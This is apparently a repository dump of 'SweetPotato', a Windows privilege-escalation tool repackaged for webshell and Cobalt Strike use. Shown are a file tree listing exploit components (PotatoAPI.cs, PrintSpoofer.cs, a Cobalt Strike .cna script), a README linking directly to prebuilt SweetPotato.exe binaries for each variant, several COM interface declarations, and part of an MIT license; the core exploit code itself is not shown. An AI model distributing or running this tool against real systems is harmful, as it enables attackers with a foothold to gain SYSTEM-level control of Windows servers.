├── README.md
├── SweetPotato-CS-old
├── .gitattributes
├── .gitignore
├── Com
│ ├── IEnumSTATSTG.cs
│ ├── ILockBytes.cs
│ ├── IMarshal.cs
│ ├── IStorage.cs
│ ├── IStream.cs
│ └── Ole32.cs
├── LICENSE
├── LocalNegotiator.cs
├── ObjRef.cs
├── Options.cs
├── PotatoAPI.cs
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
├── README.md
├── Security
│ ├── Privilege.cs
│ └── SSPIHelper.cs
├── StorageTrigger.cs
├── SweetPotato.cna
├── SweetPotato.csproj
├── SweetPotato.sln
├── app.config
├── app.manifest
└── bin
│ └── Release
│ ├── SweetPotato.cna
│ └── SweetPotato.exe
├── SweetPotato-Webshell-new
├── .vs
│ └── SweetPotato
│ │ └── v16
│ │ └── .suo
├── 12345678-1234-abcd-ef00-0123456789ab_1.0.cs
├── Com
│ ├── IEnumSTATSTG.cs
│ ├── ILockBytes.cs
│ ├── IMarshal.cs
│ ├── IStorage.cs
│ ├── IStream.cs
│ └── Ole32.cs
├── FodyWeavers.xml
├── FodyWeavers.xsd
├── LocalNegotiator.cs
├── NtApiDotNet
│ ├── AccessCheckResult.cs
│ ├── AccessMask.cs
│ ├── AccessMaskEntry.cs
│ ├── Ace.cs
│ ├── Acl.cs
│ ├── AlpcMessage.cs
│ ├── AlpcMessageAttributes.cs
│ ├── AlpcPortSection.cs
│ ├── AnnontationAttributes.cs
│ ├── BoundaryDescriptor.cs
│ ├── BufferUtils.cs
│ ├── CachedEnumerable.cs
│ ├── ClaimSecurityAttribute.cs
│ ├── CreateUserProcess.cs
│ ├── CreateUserProcessResult.cs
│ ├── DebugEvent.cs
│ ├── DisposableList.cs
│ ├── EaBuffer.cs
│ ├── Forms
│ │ ├── AclViewerControl.Designer.cs
│ │ ├── AclViewerControl.cs
│ │ ├── AclViewerControl.resx
│ │ ├── Lock.ico
│ │ ├── SecurityDescriptorViewerControl.Designer.cs
│ │ ├── SecurityDescriptorViewerControl.cs
│ │ ├── SecurityDescriptorViewerControl.resx
│ │ ├── SecurityDescriptorViewerForm.Designer.cs
│ │ ├── SecurityDescriptorViewerForm.cs
│ │ └── SecurityDescriptorViewerForm.resx
│ ├── GenericMapping.cs
│ ├── INtTransaction.cs
│ ├── KnownSids.cs
│ ├── MandatoryLabelAce.cs
│ ├── MappedFile.cs
│ ├── MemoryInformation.cs
│ ├── Ndr
│ │ ├── Marshal
│ │ │ ├── INdrConformantStructure.cs
│ │ │ ├── INdrNonEncapsulatedUnion.cs
│ │ │ ├── INdrStructure.cs
│ │ │ ├── NdrContextHandle.cs
│ │ │ ├── NdrDataRepresentation.cs
│ │ │ ├── NdrDeferralStack.cs
│ │ │ ├── NdrEmbeddedPointer.cs
│ │ │ ├── NdrEmpty.cs
│ │ │ ├── NdrEnum16.cs
│ │ │ ├── NdrInt3264.cs
│ │ │ ├── NdrInterfacePointer.cs
│ │ │ ├── NdrMarshalBuffer.cs
│ │ │ ├── NdrPickledType.cs
│ │ │ ├── NdrPipe.cs
│ │ │ ├── NdrUnmarshalBuffer.cs
│ │ │ └── NdrUnsupported.cs
│ │ ├── NdrArrayTypes.cs
│ │ ├── NdrComProxyDefinition.cs
│ │ ├── NdrCorrelationDescriptor.cs
│ │ ├── NdrExpression.cs
│ │ ├── NdrFormatter.cs
│ │ ├── NdrHandleTypes.cs
│ │ ├── NdrMiscTypes.cs
│ │ ├── NdrNativeUtils.cs
│ │ ├── NdrParser.cs
│ │ ├── NdrParserException.cs
│ │ ├── NdrPointerTypes.cs
│ │ ├── NdrProcedureDefinition.cs
│ │ ├── NdrProtocolSequenceEndpoint.cs
│ │ ├── NdrRpcServerInterface.cs
│ │ ├── NdrSimpleTypes.cs
│ │ ├── NdrStringBuilder.cs
│ │ ├── NdrStringTypes.cs
│ │ ├── NdrStructureTypes.cs
│ │ ├── NdrUnionTypes.cs
│ │ └── NdrUserMarshalTypes.cs
│ ├── NtAlpc.cs
│ ├── NtAlpcNative.cs
│ ├── NtAlpcUtils.cs
│ ├── NtApiDotNet.Core.csproj
│ ├── NtApiDotNet.csproj
│ ├── NtApiDotNet.nuspec
│ ├── NtAsyncResult.cs
│ ├── NtAtom.cs
│ ├── NtAtomNative.cs
│ ├── NtDebug.cs
│ ├── NtDebugNative.cs
│ ├── NtDesktop.cs
│ ├── NtDesktopNative.cs
│ ├── NtDirectory.cs
│ ├── NtDirectoryNative.cs
│ ├── NtEnlistment.cs
│ ├── NtEnlistmentNative.cs
│ ├── NtEtwRegistration.cs
│ ├── NtEvent.cs
│ ├── NtEventNative.cs
│ ├── NtException.cs
│ ├── NtFile.cs
│ ├── NtFileNative.cs
│ ├── NtFileUtils.cs
│ ├── NtGeneric.cs
│ ├── NtHandle.cs
│ ├── NtHeap.cs
│ ├── NtIoCompletion.cs
│ ├── NtIoCompletionNative.cs
│ ├── NtIoControlCode.cs
│ ├── NtJob.cs
│ ├── NtJobNative.cs
│ ├── NtKey.cs
│ ├── NtKeyNative.cs
│ ├── NtKeyUtils.cs
│ ├── NtKeyValue.cs
│ ├── NtLdr.cs
│ ├── NtLdrNative.cs
│ ├── NtLocale.cs
│ ├── NtMappedSection.cs
│ ├── NtMutant.cs
│ ├── NtMutantNative.cs
│ ├── NtNamedPipeFile.cs
│ ├── NtObject.cs
│ ├── NtObjectNative.cs
│ ├── NtObjectUtils.cs
│ ├── NtObjectWithDuplicate.cs
│ ├── NtObjectWithDuplicateAndInfo.cs
│ ├── NtPartition.cs
│ ├── NtPartitionNative.cs
│ ├── NtProcess.cs
│ ├── NtProcessCreateConfig.cs
│ ├── NtProcessCreateResult.cs
│ ├── NtProcessMitigations.cs
│ ├── NtProcessNative.cs
│ ├── NtProcessTrustletConfig.cs
│ ├── NtRegistryTransaction.cs
│ ├── NtRegistryTransactionNative.cs
│ ├── NtResourceManager.cs
│ ├── NtResourceManagerNative.cs
│ ├── NtResult.cs
│ ├── NtRtl.cs
│ ├── NtSection.cs
│ ├── NtSectionNative.cs
│ ├── NtSecurity.cs
│ ├── NtSecurityNative.cs
│ ├── NtSemaphore.cs
│ ├── NtSemaphoreNative.cs
│ ├── NtSession.cs
│ ├── NtStatus.cs
│ ├── NtStructures.cs
│ ├── NtSymbolicLink.cs
│ ├── NtSymbolicLinkNative.cs
│ ├── NtSystemInfo.cs
│ ├── NtSystemInfoNative.cs
│ ├── NtThread.cs
│ ├── NtThreadNative.cs
│ ├── NtTimer.cs
│ ├── NtTimerNative.cs
│ ├── NtToken.cs
│ ├── NtTokenNative.cs
│ ├── NtTrace.cs
│ ├── NtTraceNative.cs
│ ├── NtTransaction.cs
│ ├── NtTransactionManager.cs
│ ├── NtTransactionManagerNative.cs
│ ├── NtTransactionManagerUtils.cs
│ ├── NtTransactionNative.cs
│ ├── NtType.cs
│ ├── NtTypeFactory.cs
│ ├── NtUserProcessParameters.cs
│ ├── NtVirtualMemory.cs
│ ├── NtVirtualMemoryNative.cs
│ ├── NtWait.cs
│ ├── NtWaitHandle.cs
│ ├── NtWaitNative.cs
│ ├── NtWaitTimeout.cs
│ ├── NtWindow.cs
│ ├── NtWindowNative.cs
│ ├── NtWindowStation.cs
│ ├── NtWindowStationNative.cs
│ ├── NtWnf.cs
│ ├── NtWnfNative.cs
│ ├── NtWnfWellKnownNames.cs
│ ├── ObjectAttributes.cs
│ ├── OptionalValues.cs
│ ├── PrivilegeCheckResult.cs
│ ├── ProcessAttribute.cs
│ ├── ProcessModule.cs
│ ├── Properties
│ │ └── AssemblyInfo.cs
│ ├── Readme.txt
│ ├── ReparseBuffer.cs
│ ├── SafeAlpcDataViewBuffer.cs
│ ├── SafeAlpcPortMessageBuffer.cs
│ ├── SafeAlpcPortSectionHandle.cs
│ ├── SafeAlpcSecurityContextHandle.cs
│ ├── SafeArrayBuffer.cs
│ ├── SafeBufferGeneric.cs
│ ├── SafeHGlobalBuffer.cs
│ ├── SafeHandleListHandle.cs
│ ├── SafeIoStatusBuffer.cs
│ ├── SafeKernelObjectHandle.cs
│ ├── SafePrivilegeSetBuffer.cs
│ ├── SafeProcessHeapBuffer.cs
│ ├── SafeProcessParametersBuffer.cs
│ ├── SafeSidBufferHandle.cs
│ ├── SafeStringBuffer.cs
│ ├── SafeStructureInOutBuffer.cs
│ ├── SafeTokenGroupsBuffer.cs
│ ├── SafeTokenPrivilegesBuffer.cs
│ ├── Security
│ │ └── Policy
│ │ │ ├── CentralAccessPolicy.cs
│ │ │ └── CentralAccessRule.cs
│ ├── SecurityCapabilities.cs
│ ├── SecurityDescriptor.cs
│ ├── SecurityDescriptorSid.cs
│ ├── SecurityQualityOfService.cs
│ ├── Sid.cs
│ ├── SidIdentifierAuthority.cs
│ ├── ThreadImpersonationContext.cs
│ ├── TokenGroupsBuilder.cs
│ ├── TokenPrivilege.cs
│ ├── TokenPrivilegesBuilder.cs
│ ├── UnicodeString.cs
│ ├── UnicodeStringBytesSafeBuffer.cs
│ ├── UserGroup.cs
│ ├── Utilities
│ │ ├── ASN1
│ │ │ ├── ASN1Utils.cs
│ │ │ ├── DERParser.cs
│ │ │ ├── DERTagType.cs
│ │ │ ├── DERUtils.cs
│ │ │ ├── DERValue.cs
│ │ │ ├── OIDValues.cs
│ │ │ └── UniversalTag.cs
│ │ ├── Memory
│ │ │ ├── CrossBitnessProcessMemoryReader.cs
│ │ │ ├── CrossBitnessTypeAttribute.cs
│ │ │ ├── CurrentProcessMemoryReader.cs
│ │ │ ├── IMemoryReader.cs
│ │ │ ├── ProcessMemoryReader.cs
│ │ │ ├── ProcessMemoryStream.cs
│ │ │ └── SafeBufferWrapper.cs
│ │ ├── SafeBuffers
│ │ │ └── SafeGuidArrayBuffer.cs
│ │ ├── Security
│ │ │ ├── MD4.cs
│ │ │ └── ObjectTypeTree.cs
│ │ ├── Text
│ │ │ ├── BinaryEncoding.cs
│ │ │ ├── HexDumpBuilder.cs
│ │ │ └── StringUtils.cs
│ │ └── Token
│ │ │ └── ClaimSecurityAttributeBuilder.cs
│ ├── Win32
│ │ ├── AppContainerProfile.cs
│ │ ├── ConsoleSession.cs
│ │ ├── Debugger
│ │ │ ├── ArrayTypeInformation.cs
│ │ │ ├── BaseTypeInformation.cs
│ │ │ ├── DataSymbolInformation.cs
│ │ │ ├── DbgHelpSymbolResolver.cs
│ │ │ ├── EnumProcessModulesFilter.cs
│ │ │ ├── EnumTypeInformation.cs
│ │ │ ├── IMAGEHLP_MODULE64.cs
│ │ │ ├── IMAGEHLP_SYMBOL_TYPE_INFO.cs
│ │ │ ├── ISymbolTypeResolver.cs
│ │ │ ├── MODULEINFO.cs
│ │ │ ├── PointerTypeInformation.cs
│ │ │ ├── SYMBOL_INFO.cs
│ │ │ ├── SYM_TYPE.cs
│ │ │ ├── SymOptions.cs
│ │ │ ├── SymTagEnum.cs
│ │ │ ├── SymbolInformation.cs
│ │ │ ├── SymbolInformationType.cs
│ │ │ ├── TI_FINDCHILDREN_PARAMS.cs
│ │ │ ├── TypeInformation.cs
│ │ │ ├── TypeInformationCache.cs
│ │ │ ├── UdtKind.cs
│ │ │ └── UserDefinedTypeInformation.cs
│ │ ├── Device
│ │ │ ├── DeviceNativeMethods.cs
│ │ │ └── DeviceUtils.cs
│ │ ├── DirectoryService
│ │ │ ├── DirectoryServiceAccessRights.cs
│ │ │ └── DirectoryServiceUtils.cs
│ │ ├── EtwServiceTriggerInformation.cs
│ │ ├── EventTrace.cs
│ │ ├── EventTraceLog.cs
│ │ ├── EventTraceProvider.cs
│ │ ├── EventTracing.cs
│ │ ├── ExecutableManifest.cs
│ │ ├── ISymbolResolver.cs
│ │ ├── LogonUtils.cs
│ │ ├── PackageIdentity.cs
│ │ ├── Rpc
│ │ │ ├── CodeGenUtils.cs
│ │ │ ├── MarshalHelperBuilder.cs
│ │ │ ├── RpcClientBase.cs
│ │ │ ├── RpcClientBuilder.cs
│ │ │ ├── RpcClientBuilderArguments.cs
│ │ │ ├── RpcClientResponse.cs
│ │ │ ├── RpcTypeDescriptor.cs
│ │ │ ├── RpcUtils.cs
│ │ │ └── Transport
│ │ │ │ ├── ExtendedErrorInfo.cs
│ │ │ │ ├── IRpcClientTransport.cs
│ │ │ │ ├── RpcAlpcClientTransport.cs
│ │ │ │ ├── RpcAlpcInternals.cs
│ │ │ │ ├── RpcClientTransportFactory.cs
│ │ │ │ ├── RpcExtendedErrorInfo.cs
│ │ │ │ └── RpcFaultException.cs
│ │ ├── RpcAlpcServer.cs
│ │ ├── RpcClient.cs
│ │ ├── RpcEndpoint.cs
│ │ ├── RpcEndpointMapper.cs
│ │ ├── RpcServer.cs
│ │ ├── RunningService.cs
│ │ ├── SafeHandles
│ │ │ ├── SafeAuditBuffer.cs
│ │ │ ├── SafeAuthZClientContextHandle.cs
│ │ │ ├── SafeAuthZResourceManagerHandle.cs
│ │ │ ├── SafeCoTaskMemHandle.cs
│ │ │ ├── SafeLocalAllocBuffer.cs
│ │ │ ├── SafeLsaHandle.cs
│ │ │ ├── SafeLsaLogonHandle.cs
│ │ │ ├── SafeLsaMemoryBuffer.cs
│ │ │ └── SafeLsaReturnBufferHandle.cs
│ │ ├── SafeLoadLibraryHandle.cs
│ │ ├── SafeWin32Exception.cs
│ │ ├── Security
│ │ │ ├── Audit
│ │ │ │ ├── AuditAccessRights.cs
│ │ │ │ ├── AuditCategory.cs
│ │ │ │ ├── AuditGlobalSaclType.cs
│ │ │ │ ├── AuditPolicyEventType.cs
│ │ │ │ ├── AuditPolicyFlags.cs
│ │ │ │ ├── AuditSecurityUtils.cs
│ │ │ │ └── AuditSubCategory.cs
│ │ │ ├── Authentication
│ │ │ │ ├── ASN1AuthenticationToken.cs
│ │ │ │ ├── AuthenticationCredentials.cs
│ │ │ │ ├── AuthenticationFlags.cs
│ │ │ │ ├── AuthenticationImpersonationContext.cs
│ │ │ │ ├── AuthenticationPackage.cs
│ │ │ │ ├── AuthenticationToken.cs
│ │ │ │ ├── ClientAuthenticationContext.cs
│ │ │ │ ├── CredentialHandle.cs
│ │ │ │ ├── GSSAPIUtils.cs
│ │ │ │ ├── IAuthenticationContext.cs
│ │ │ │ ├── Kerberos
│ │ │ │ │ ├── KRB_CHKSUM_TYPE.cs
│ │ │ │ │ ├── KRB_ENC_TYPE.cs
│ │ │ │ │ ├── KRB_MSG_TYPE.cs
│ │ │ │ │ ├── KRB_NAME_TYPE.cs
│ │ │ │ │ ├── KerberosAPReplyAuthenticationToken.cs
│ │ │ │ │ ├── KerberosAPRequestAuthenticationToken.cs
│ │ │ │ │ ├── KerberosAuthenticationToken.cs
│ │ │ │ │ ├── KerberosEncryptedData.cs
│ │ │ │ │ ├── KerberosKey.cs
│ │ │ │ │ ├── KerberosTGTReplyAuthenticationToken.cs
│ │ │ │ │ ├── KerberosTGTRequestAuthenticationToken.cs
│ │ │ │ │ ├── KerberosTicket.cs
│ │ │ │ │ ├── KerberosUtils.cs
│ │ │ │ │ └── PrincipalName.cs
│ │ │ │ ├── LogonSession.cs
│ │ │ │ ├── Negotiate
│ │ │ │ │ └── NegotiateAuthenticationToken.cs
│ │ │ │ ├── Ntlm
│ │ │ │ │ ├── NtlmAuthenticateAuthenticationToken.cs
│ │ │ │ │ ├── NtlmAuthenticateAuthenticationTokenV2.cs
│ │ │ │ │ ├── NtlmAuthenticationToken.cs
│ │ │ │ │ ├── NtlmAvPair.cs
│ │ │ │ │ ├── NtlmChallengeAuthenticationToken.cs
│ │ │ │ │ ├── NtlmNegotiateAuthenticationToken.cs
│ │ │ │ │ └── NtlmUtils.cs
│ │ │ │ ├── ServerAuthenticationContext.cs
│ │ │ │ ├── ServicePrincipalName.cs
│ │ │ │ └── UserCredentials.cs
│ │ │ ├── Authorization
│ │ │ │ ├── AuthZAccessCheckResult.cs
│ │ │ │ ├── AuthZContext.cs
│ │ │ │ ├── AuthZResourceManager.cs
│ │ │ │ ├── ProgressInvokeSetting.cs
│ │ │ │ ├── SeObjectType.cs
│ │ │ │ ├── SecurityDescriptorInheritanceSource.cs
│ │ │ │ └── TreeSecInfo.cs
│ │ │ ├── Native
│ │ │ │ ├── AUDIT_POLICY_INFORMATION.cs
│ │ │ │ ├── AUTHZ_ACCESS_REPLY.cs
│ │ │ │ ├── AUTHZ_ACCESS_REQUEST.cs
│ │ │ │ ├── AUTHZ_CONTEXT_INFORMATION_CLASS.cs
│ │ │ │ ├── AuthZAccessCheckFlags.cs
│ │ │ │ ├── CENTRAL_ACCESS_POLICY.cs
│ │ │ │ ├── CENTRAL_ACCESS_POLICY_ENTRY.cs
│ │ │ │ ├── INHERITED_FROM.cs
│ │ │ │ ├── KERB_LOGON_SUBMIT_TYPE.cs
│ │ │ │ ├── KERB_S4U_LOGON.cs
│ │ │ │ ├── KERB_TICKET_LOGON.cs
│ │ │ │ ├── LSA_ENUMERATION_INFORMATION.cs
│ │ │ │ ├── LSA_LAST_INTER_LOGON_INFO.cs
│ │ │ │ ├── LsaLogonUserFlags.cs
│ │ │ │ ├── LsaString.cs
│ │ │ │ ├── OptionalLuid.cs
│ │ │ │ ├── POLICY_AUDIT_SID_ARRAY.cs
│ │ │ │ ├── QUOTA_LIMITS.cs
│ │ │ │ ├── SECPKG_ATTR.cs
│ │ │ │ ├── SECURITY_LOGON_SESSION_DATA.cs
│ │ │ │ ├── SEC_CHANNEL_BINDING.cs
│ │ │ │ ├── SEC_WINNT_AUTH_IDENTITY.cs
│ │ │ │ ├── SEC_WINNT_AUTH_IDENTITY_EX.cs
│ │ │ │ ├── SecBuffer.cs
│ │ │ │ ├── SecBufferDesc.cs
│ │ │ │ ├── SecBufferType.cs
│ │ │ │ ├── SecHandle.cs
│ │ │ │ ├── SecPkgContextStructs.cs
│ │ │ │ ├── SecPkgContext_SessionKey.cs
│ │ │ │ ├── SecPkgInfo.cs
│ │ │ │ ├── SecStatusCode.cs
│ │ │ │ ├── SecWinNtAuthIdentityFlags.cs
│ │ │ │ ├── SecureStringMarshal.cs
│ │ │ │ ├── SecurityNativeMethods.cs
│ │ │ │ └── TOKEN_SOURCE.cs
│ │ │ ├── Policy
│ │ │ │ ├── AccountRight.cs
│ │ │ │ ├── AccountRightLogonType.cs
│ │ │ │ └── LsaPolicyAccessRights.cs
│ │ │ └── Win32Security.cs
│ │ ├── SecurityInformationImpl.cs
│ │ ├── SendInput.cs
│ │ ├── ServiceInformation.cs
│ │ ├── ServiceTriggerCustomData.cs
│ │ ├── ServiceTriggerInformation.cs
│ │ ├── ServiceUtils.cs
│ │ ├── SymbolLoadedModule.cs
│ │ ├── SymbolResolver.cs
│ │ ├── TokenUtils.cs
│ │ ├── Win32Debug.cs
│ │ ├── Win32Error.cs
│ │ ├── Win32NativeMethods.cs
│ │ ├── Win32Process.cs
│ │ ├── Win32ProcessConfig.cs
│ │ ├── Win32ProcessNative.cs
│ │ ├── Win32Utils.cs
│ │ └── WnfServiceTriggerInformation.cs
│ └── packages.config
├── ObjRef.cs
├── Options.cs
├── PotatoAPI.cs
├── PrintSpoofer.cs
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
├── Security
│ ├── Privilege.cs
│ └── SSPIHelper.cs
├── StorageTrigger.cs
├── SweetPotato.csproj
├── SweetPotato.sln
├── app.config
├── app.manifest
├── bin
│ └── Release
│ │ └── SweetPotato.exe
├── packages.config
└── packages
│ ├── Costura.Fody.4.1.0
│ ├── .signature.p7s
│ ├── Costura.Fody.4.1.0.nupkg
│ ├── build
│ │ └── Costura.Fody.props
│ ├── lib
│ │ └── net40
│ │ │ ├── Costura.dll
│ │ │ └── Costura.xml
│ └── weaver
│ │ ├── Costura.Fody.dll
│ │ └── Costura.Fody.xcf
│ └── Fody.6.0.0
│ ├── .signature.p7s
│ ├── Fody.6.0.0.nupkg
│ ├── build
│ └── Fody.targets
│ ├── netclassictask
│ ├── Fody.dll
│ ├── FodyCommon.dll
│ ├── FodyHelpers.dll
│ ├── FodyIsolated.dll
│ ├── Mono.Cecil.Pdb.dll
│ ├── Mono.Cecil.Pdb.pdb
│ ├── Mono.Cecil.Rocks.dll
│ ├── Mono.Cecil.Rocks.pdb
│ ├── Mono.Cecil.dll
│ └── Mono.Cecil.pdb
│ └── netstandardtask
│ ├── Fody.dll
│ ├── FodyCommon.dll
│ ├── FodyHelpers.dll
│ ├── FodyIsolated.dll
│ ├── Mono.Cecil.Pdb.dll
│ ├── Mono.Cecil.Pdb.pdb
│ ├── Mono.Cecil.Rocks.dll
│ ├── Mono.Cecil.Rocks.pdb
│ ├── Mono.Cecil.dll
│ └── Mono.Cecil.pdb
├── SweetPotato-Webshell-old
├── Com
│ ├── IEnumSTATSTG.cs
│ ├── ILockBytes.cs
│ ├── IMarshal.cs
│ ├── IStorage.cs
│ ├── IStream.cs
│ └── Ole32.cs
├── LICENSE
├── LocalNegotiator.cs
├── ObjRef.cs
├── Options.cs
├── PotatoAPI.cs
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
├── Security
│ ├── Privilege.cs
│ └── SSPIHelper.cs
├── StorageTrigger.cs
├── SweetPotato.csproj
├── SweetPotato.sln
├── app.config
├── app.manifest
└── bin
│ └── Release
│ └── SweetPotato.exe
└── img
├── cs-old.png
├── cs-old2.png
├── webshell-new.png
└── webshell-old.png
/README.md:
--------------------------------------------------------------------------------
1 | # SweetPotato
2 |
3 | #### download
4 |
5 | [SweetPotato.exe](https://raw.githubusercontent.com/uknowsec/SweetPotato/master/SweetPotato-Webshell-new/bin/Release/SweetPotato.exe)
6 |
7 |
8 | #### img
9 |
10 | ### SweetPotato-Webshell-new
11 |
12 | 
13 |
14 |
15 |
16 | ### SweetPotato-Webshell-old
17 |
18 | #### download
19 |
20 | [SweetPotato.exe](https://raw.githubusercontent.com/uknowsec/SweetPotato/master/SweetPotato-Webshell-old/bin/Release/SweetPotato.exe)
21 |
22 | #### img
23 |
24 | 
25 |
26 | ### SweetPotato-CS-old
27 |
28 | #### download
29 |
30 | [SweetPotato.cna](https://raw.githubusercontent.com/uknowsec/SweetPotato/master/SweetPotato-CS-old/bin/Release/SweetPotato.cna)
31 |
32 | [SweetPotato.exe](https://raw.githubusercontent.com/uknowsec/SweetPotato/master/SweetPotato-CS-old/bin/Release/SweetPotato.exe)
33 |
34 | #### img
35 |
36 | - CNA
37 |
38 | 
39 |
40 |
41 |
42 | - CLI
43 |
44 | 
45 |
46 | ### Reference
47 |
48 | https://github.com/CCob/SweetPotato
49 |
50 | https://github.com/Tycx2ry/SweetPotato_CS
--------------------------------------------------------------------------------
/SweetPotato-CS-old/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 |
--------------------------------------------------------------------------------
/SweetPotato-CS-old/Com/IEnumSTATSTG.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace SweetPotato {
5 | [ComImport]
6 | [Guid("0000000d-0000-0000-C000-000000000046")]
7 | [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
8 | public interface IEnumSTATSTG {
9 | // The user needs to allocate an STATSTG array whose size is celt.
10 | [PreserveSig]
11 | uint
12 | Next(uint celt, [MarshalAs(UnmanagedType.LPArray), Out] STATSTG[] rgelt, out uint pceltFetched);
13 |
14 | void Skip(uint celt);
15 |
16 | void Reset();
17 |
18 | [return: MarshalAs(UnmanagedType.Interface)]
19 | IEnumSTATSTG Clone();
20 | }
21 | }
22 |
--------------------------------------------------------------------------------
/SweetPotato-CS-old/Com/ILockBytes.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace SweetPotato {
5 | [ComVisible(false)]
6 | [ComImport, InterfaceType(ComInterfaceType.InterfaceIsIUnknown), Guid("0000000A-0000-0000-C000-000000000046")]
7 | public interface ILockBytes {
8 | //Note: These two by(reference 32-bit integers (ULONG) could be used as return values instead,
9 | // but they are not tagged [retval] in the IDL, so for consitency's sake...
10 | void ReadAt(long ulOffset, System.IntPtr pv, int cb, out System.UInt32 pcbRead);
11 | void WriteAt(long ulOffset, System.IntPtr pv, int cb, out System.UInt32 pcbWritten);
12 | void Flush();
13 | void SetSize(long cb);
14 | void LockRegion(long libOffset, long cb, int dwLockType);
15 | void UnlockRegion(long libOffset, long cb, int dwLockType);
16 | void Stat(out System.Runtime.InteropServices.STATSTG pstatstg, int grfStatFlag);
17 |
18 | }
19 |
20 |
21 | }
22 |
--------------------------------------------------------------------------------
/SweetPotato-CS-old/Com/IMarshal.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace SweetPotato {
5 |
6 | [Guid("00000003-0000-0000-C000-000000000046")]
7 | [InterfaceType(1)]
8 | [ComConversionLoss]
9 | [ComImport]
10 | public interface IMarshal {
11 |
12 | void GetUnmarshalClass([In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS, out Guid pCid);
13 | void GetMarshalSizeMax([In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS, out uint pSize);
14 | void MarshalInterface([MarshalAs(28)] [In] IStream pstm, [In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS);
15 | void UnmarshalInterface([MarshalAs(28)] [In] IStream pstm, [In] ref Guid riid, out IntPtr ppv);
16 | void ReleaseMarshalData([MarshalAs(28)] [In] IStream pstm);
17 | void DisconnectObject([In] uint dwReserved);
18 | }
19 | }
20 |
--------------------------------------------------------------------------------
/SweetPotato-CS-old/Com/IStorage.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace SweetPotato {
5 |
6 | [InterfaceType(1)]
7 | [ComConversionLoss]
8 | [Guid("0000000B-0000-0000-C000-000000000046")]
9 | [ComImport]
10 | public interface IStorage {
11 | void CreateStream([MarshalAs(21)] [In] string pwcsName, [In] uint grfMode, [In] uint reserved1, [In] uint reserved2, [MarshalAs(28)] out IStream ppstm);
12 | void OpenStream([MarshalAs(21)] [In] string pwcsName, [In] IntPtr reserved1, [In] uint grfMode, [In] uint reserved2, [MarshalAs(28)] out IStream ppstm);
13 | void CreateStorage([MarshalAs(21)] [In] string pwcsName, [In] uint grfMode, [In] uint reserved1, [In] uint reserved2, [MarshalAs(28)] out IStorage ppstg);
14 | void OpenStorage([MarshalAs(21)] [In] string pwcsName, [MarshalAs(28)] [In] IStorage pstgPriority, [In] uint grfMode, [In] IntPtr snbExclude, [In] uint reserved, [MarshalAs(28)] out IStorage ppstg);
15 | void CopyTo([In] uint ciidExclude, [MarshalAs(42, SizeParamIndex = 0)] [In] Guid[] rgiidExclude, [In] IntPtr snbExclude, [MarshalAs(28)] [In] IStorage pstgDest);
16 | void MoveElementTo([MarshalAs(21)] [In] string pwcsName, [MarshalAs(28)] [In] IStorage pstgDest, [MarshalAs(21)] [In] string pwcsNewName, [In] uint grfFlags);
17 | void Commit([In] uint grfCommitFlags);
18 | void Revert();
19 | void EnumElements([In] uint reserved1, [In] IntPtr reserved2, [In] uint reserved3, [MarshalAs(28)] out IEnumSTATSTG ppEnum);
20 | void DestroyElement([MarshalAs(21)] [In] string pwcsName);
21 | void RenameElement([MarshalAs(21)] [In] string pwcsOldName, [MarshalAs(21)] [In] string pwcsNewName);
22 | void SetElementTimes([MarshalAs(21)] [In] string pwcsName, [MarshalAs(42)] [In] FILETIME[] pctime, [MarshalAs(42)] [In] FILETIME[] patime, [MarshalAs(42)] [In] FILETIME[] pmtime);
23 | void SetClass([In] ref Guid clsid);
24 | void SetStateBits([In] uint grfStateBits, [In] uint grfMask);
25 | void Stat([MarshalAs(42)] [Out] STATSTG[] pstatstg, [In] uint grfStatFlag);
26 | }
27 | }
28 |
29 |
--------------------------------------------------------------------------------
/SweetPotato-CS-old/Com/IStream.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace SweetPotato {
5 | [ComImport, Guid("0000000c-0000-0000-C000-000000000046"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
6 | public interface IStream {
7 | void Read([Out, MarshalAs(UnmanagedType.LPArray, SizeParamIndex = 1)] byte[] pv, uint cb, out uint pcbRead);
8 | void Write([MarshalAs(UnmanagedType.LPArray, SizeParamIndex = 1)] byte[] pv, uint cb, out uint pcbWritten);
9 | void Seek(long dlibMove, uint dwOrigin, out long plibNewPosition);
10 | void SetSize(long libNewSize);
11 | void CopyTo(IStream pstm, long cb, out long pcbRead, out long pcbWritten);
12 | void Commit(uint grfCommitFlags);
13 | void Revert();
14 | void LockRegion(long libOffset, long cb, uint dwLockType);
15 | void UnlockRegion(long libOffset, long cb, uint dwLockType);
16 | void Stat(out STATSTG pstatstg, uint grfStatFlag);
17 | void Clone(out IStream ppstm);
18 | }
19 | }
20 |
--------------------------------------------------------------------------------
/SweetPotato-CS-old/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2020 CCob
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
